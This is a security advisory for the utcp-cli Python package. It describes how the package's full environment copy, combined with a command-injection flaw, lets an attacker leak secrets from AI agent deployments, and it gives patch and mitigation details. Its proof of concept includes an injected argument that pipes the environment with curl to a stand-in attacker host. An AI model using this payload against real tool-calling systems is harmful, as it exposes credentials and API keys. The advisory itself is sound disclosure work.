GHSA-5v57-8rxj-3p2r

Suggest an improvement
Source
https://github.com/advisories/GHSA-5v57-8rxj-3p2r
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-5v57-8rxj-3p2r/GHSA-5v57-8rxj-3p2r.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-5v57-8rxj-3p2r
Aliases
  • CVE-2026-45370
Published
2026-05-14T20:56:07Z
Modified
2026-05-16T00:08:47.226722Z
Severity
  • 7.7 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N CVSS Calculator
Summary
python-utcp: Full Process Environment Exposed to CLI Subprocess - Secrets Leakage via Command Injection
Details

Summary

_prepare_environment() in cli_communication_protocol.py passes a full copy of os.environ to every CLI subprocess. When combined with the Command Injection vulnerability (CWE-78) in _substitute_utcp_args() tracked as GHSA-33p6-5jxp-p3x4, an attacker can exfiltrate all process-level secrets in a single tool call.

Vulnerable Code

# cli_communication_protocol.py
def _prepare_environment(self, provider: CliCallTemplate) -> Dict[str, str]:
    env = os.environ.copy()        # All secrets inherited
    if provider.env_vars:
        env.update(provider.env_vars)
    return env

Impact

Any environment variable present in the host process is accessible to injected commands. In typical AI agent deployments this includes:

  • Cloud provider credentials (AWSSECRETACCESSKEY, AZURECLIENT_SECRET)
  • Database connection strings (DATABASE_URL)
  • LLM API keys (OPENAIAPIKEY, ANTHROPICAPIKEY)
  • Internal service tokens

Proof of Concept

# Tool defined as:
{"command": "grep UTCP_ARG_pattern_UTCP_END logfile.txt"}

# Attacker supplies:
tool_args = {"pattern": "x; env | curl -s -d @- https://attacker.com"}

# Executed bash script:
# CMD_0_OUTPUT=$(grep x; env | curl -s -d @- https://attacker.com 2>&1)
# -> Full env dump sent to attacker including all secrets

Patched

Fixed in utcp-cli 1.1.2. _prepare_environment no longer copies the full host environment. Inheritance is controlled by a new CliCallTemplate.inherit_env_vars field:

  • null (default): a small built-in OS-specific allowlist (PATH, HOME, LANG on Unix; PATH, PATHEXT, SYSTEMROOT, USERPROFILE, etc. on Windows) is inherited so shells and binaries continue to work.
  • []: strict mode -- nothing from the host environment reaches the subprocess; only env_vars is propagated.
  • ["FOO", "BAR"]: exactly those host variables are inherited (replaces, not merges with, the default allowlist).

env_vars is always layered on top and overrides any inherited value. Secrets like OPENAI_API_KEY no longer reach the subprocess unless the call template explicitly opts them in.

Mitigation

Upgrade to utcp-cli >= 1.1.2. There is no workaround in earlier versions short of stripping secrets from the host process before any CLI tool call.

Credit

Reported by @ZeroXJacks.

Database specific 
{
    "github_reviewed_at": "2026-05-14T20:56:07Z",
    "github_reviewed": true,
    "cwe_ids": [
        "CWE-526"
    ],
    "nvd_published_at": "2026-05-14T21:16:48Z",
    "severity": "HIGH"
}
References

Affected packages

PyPI / utcp-cli

Package

Name
utcp-cli
View open source insights on deps.dev
Purl
pkg:pypi/utcp-cli

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
1.1.2

Affected versions

1.*
1.0.0
1.0.1
1.0.2
1.1.0
1.1.1

Database specific

last_known_affected_version_range 
"<= 1.1.1"
source 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-5v57-8rxj-3p2r/GHSA-5v57-8rxj-3p2r.json"